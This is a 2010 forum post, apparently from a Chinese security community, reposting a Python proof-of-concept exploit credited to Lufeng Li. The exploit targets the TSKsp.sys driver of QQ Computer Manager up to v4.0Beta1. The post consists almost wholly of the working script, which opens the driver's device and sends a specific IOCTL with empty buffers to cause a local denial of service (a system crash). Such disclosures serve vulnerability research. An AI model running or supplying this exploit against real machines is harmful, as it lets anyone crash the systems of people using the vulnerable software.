首页
社区
课程
招聘
[推荐]又见牛人峰哥。QQ Computer Manager TSKsp.sys Local Denial of Service Exploit
发表于: 2010-8-10 07:48 4079

[推荐]又见牛人峰哥。QQ Computer Manager TSKsp.sys Local Denial of Service Exploit

2010-8-10 07:48
4079
#!/usr/bin/python  

   

#################################################################  

#  

# Title: QQ Computer Manager TSKsp.sys Local Denial of Service Exploit  

# Author: Lufeng Li of Neusoft Corporation  

# Vendor: http://pcmgr.qq.com  

# Vulnerable App: http://dl_dir2.qq.com/invc/qqmaster/setup/QQPCMgr_Setup.exe  

# Platform: Windows XPSP3 Chinese Simplified  

# Tested: QQpcmgr v4.0Beta1  

# Vulnerable: QQpcmgr<=v4.0Beta1  

#   

#################################################################  

from ctypes import *

   

kernel32 = windll.kernel32  

Psapi    = windll.Psapi  

   

if __name__ == '__main__':  

    GENERIC_READ  = 0x80000000

    GENERIC_WRITE = 0x40000000

    OPEN_EXISTING = 0x3

    CREATE_ALWAYS = 0x2

   

    DEVICE_NAME   = "\\\\.\\tsksp"

    dwReturn      = c_ulong()  

    out_data      = ''  

    in_data       = ''  

    driver_handle1 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE,  

                        0, None, CREATE_ALWAYS, 0, None)  

    dev_ioctl = kernel32.DeviceIoControl(driver_handle1, 0x22e01c, in_data,0, out_data, 0,byref(dwReturn), None)

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//